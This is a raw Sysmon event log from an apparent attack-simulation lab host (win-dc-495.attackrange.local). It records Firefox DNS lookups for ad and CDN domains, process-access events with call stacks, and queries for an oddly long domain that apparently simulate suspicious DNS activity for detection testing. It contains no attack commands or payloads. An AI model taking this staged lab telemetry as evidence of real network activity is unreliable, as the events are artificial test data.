14:01:03.282{59A5CD1D-945A-6005-3305-00000000A301}7052match.adsrvr.org0type: 5 match-1943069928.eu-west-1.elb.amazonaws.com;::ffff:54.154.164.132;::ffff:54.171.98.69;::ffff:54.216.123.169;::ffff:54.228.21.183;::ffff:18.200.32.159;::ffff:18.203.78.129;::ffff:52.31.46.99;::ffff:52.210.149.10;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.268{59A5CD1D-945A-6005-3305-00000000A301}7052sync.rtk.io9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.267{59A5CD1D-945A-6005-3305-00000000A301}7052e8960.b.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.266{59A5CD1D-945A-6005-3305-00000000A301}7052e6115.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.265{59A5CD1D-945A-6005-3305-00000000A301}7052e8960.b.akamaiedge.net023.211.161.129;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.265{59A5CD1D-945A-6005-3305-00000000A301}7052eus.rubiconproject.com0type: 5 eus.rubiconproject.com.edgekey.net;type: 5 e8960.b.akamaiedge.net;::ffff:23.211.161.129;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.264{59A5CD1D-945A-6005-3305-00000000A301}7052e6115.g.akamaiedge.net0104.79.88.141;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.264{59A5CD1D-945A-6005-3305-00000000A301}7052acdn.adnxs.com0type: 5 secure-adnxs.edgekey.net;type: 5 e6115.g.akamaiedge.net;::ffff:104.79.88.141;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:03.251{59A5CD1D-945A-6005-3305-00000000A301}7052sync.rtk.io0147.75.107.42;147.75.107.82;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.314{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.240{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.158{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.158{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.111{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000018218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.111{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 22542200x800000000000000018217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.762{59A5CD1D-8E56-6005-2E00-00000000A301}246442.107.75.147.in-addr.arpa.0type: 12 lbadstorm-pk-nj-102;C:\Windows\sysmon64.exe 22542200x800000000000000018216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.721{59A5CD1D-8E56-6005-2E00-00000000A301}246411.164.228.46.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000018215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.687{59A5CD1D-8E56-6005-2E00-00000000A301}2464141.88.79.104.in-addr.arpa.0type: 12 a104-79-88-141.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.682{59A5CD1D-8E56-6005-2E00-00000000A301}24649.119.22.2.in-addr.arpa.0type: 12 a2-22-119-9.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.681{59A5CD1D-8E56-6005-2E00-00000000A301}2464159.242.31.52.in-addr.arpa.0type: 12 ec2-52-31-242-159.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.681{59A5CD1D-8E56-6005-2E00-00000000A301}2464173.141.246.34.in-addr.arpa.0type: 12 ec2-34-246-141-173.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.680{59A5CD1D-8E56-6005-2E00-00000000A301}2464132.164.154.54.in-addr.arpa.0type: 12 ec2-54-154-164-132.eu-west-1.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000018210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:04.680{59A5CD1D-8E56-6005-2E00-00000000A301}2464129.161.211.23.in-addr.arpa.0type: 12 a23-211-161-129.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000018225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.028{59A5CD1D-945A-6005-3305-00000000A301}7052thelongestdomainnameintheworldandthensomeandthensomemoreandmore.com031.193.128.45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.027{59A5CD1D-945A-6005-3305-00000000A301}7052thelongestdomainnameintheworldandthensomeandthensomemoreandmore.com0::ffff:31.193.128.45;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:07.860{59A5CD1D-8E56-6005-2E00-00000000A301}246445.128.193.31.in-addr.arpa.0type: 12 ns.nothingtoseehere.org;C:\Windows\sysmon64.exe 22542200x800000000000000018226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:06.426{59A5CD1D-945A-6005-3305-00000000A301}7052thelongestdomainnameintheworldandthensomeandthensomemoreandmore.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000018230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:17.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:20.444{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:20.444{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.298{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.298{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.110{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000018233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:22.110{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000018256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:01:24.859{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 